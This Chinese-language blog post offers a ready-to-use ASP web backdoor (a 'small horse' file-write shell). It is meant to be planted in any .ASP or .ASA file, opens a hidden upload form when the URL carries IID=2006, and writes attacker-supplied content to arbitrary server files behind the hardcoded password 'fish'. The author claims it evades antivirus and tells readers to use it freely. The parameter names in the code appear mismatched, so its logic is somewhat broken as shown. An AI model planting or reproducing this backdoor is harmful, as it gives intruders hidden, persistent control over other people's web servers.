学步园

      我跟喜欢叫它瑞士军刀，这段函数可以插入任何.ASP文件和.ASA文件。只要在地址中加上IID=2006,2006是我上大学的年份哦。

     个人认为asp的漏洞其实不多的，为什么网路上说ASP漏洞多，本人认为是由于.ASP研究的人比任何一种WEB语言多的多，不是同一数量级上的概念，所以研究的人多了，也就暴露其问题了，这个没什么好说的是吧？

    这段还是其实是一段上传函数，一般的Web Hacker都比较了解。中国管他加小马，外国管他叫Back Door。其实一个道理了。

    代码如下：

<%<br /> DoorForm()<br /> pwd()<br /> function DoorForm()<br /> dim iid<br /> iid = request("iid")<br /> if iid= 2006 then<br /> response.write "<form method='post' action='?action=set&door=fine'>" &_<br /> "<label></label>" &_<br /> "<label>" &_<br /> "<textarea name='Text' cols='50' rows='10' id='Text'>写入内容" &_<br /> "</textarea>" &_<br /> "<br />" &_<br /> "<br />" &_<br /> "<input name='FileName' type='text' id='FileName' value='文件名' size='52' maxlength='50' />" &_<br /> "<br />" &_<br /> "<br />" &_<br /> "<input name='Pass' type='password' id='Pass' value='xxxxxxxxxxxxxxxxxxxxxx' size='52' maxlength='50' />" &_<br /> "<br />" &_<br /> "<br />" &_<br /> "</label>" &_<br /> "<label>" &_<br /> "<input type='submit' name='Submit' value='保存' />" &_<br /> "</label>" &_<br /> "</form>"<br /> end if<br /> end function<br /> %><br /> <%<br /> function pwd()<br /> dim door<br /> door=request("pwd")<br /> if door="fine" then<br /> dim samllbad,pass<br /> pass="fish"<br /> if request("action")="set" then<br /> if request("pass")=pass then<br /> Text=request("Text")<br /> FileName=request("FileName")<br /> set fs=server.CreateObject("Scripting.FileSystemObject")<br /> set file=fs.OpenTextFile(server.MapPath(FileName),8,True)<br /> file.writeline Text<br /> file.close<br /> set file=nothing<br /> set fs=nothing<br /> response.write ("保存成功！")<br /> end if<br /> else<br /> response.write ("密码错误！")<br /> end if<br /> end if<br /> end function<br /> %><br />

     还有我告诉大家，我不写大马，是因为等你看到的时候，这个已经是一堆垃圾代码了。以上这个函数是不会被杀毒软件查杀的，请放心使用。